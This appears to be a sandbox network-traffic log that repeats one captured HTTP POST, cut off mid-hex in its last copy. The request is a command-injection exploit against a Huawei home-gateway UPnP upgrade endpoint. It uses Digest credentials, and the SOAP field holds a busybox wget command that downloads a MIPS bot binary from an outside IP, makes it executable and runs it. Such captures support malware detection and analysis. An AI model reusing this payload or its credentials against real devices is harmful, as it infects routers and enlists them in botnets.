Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 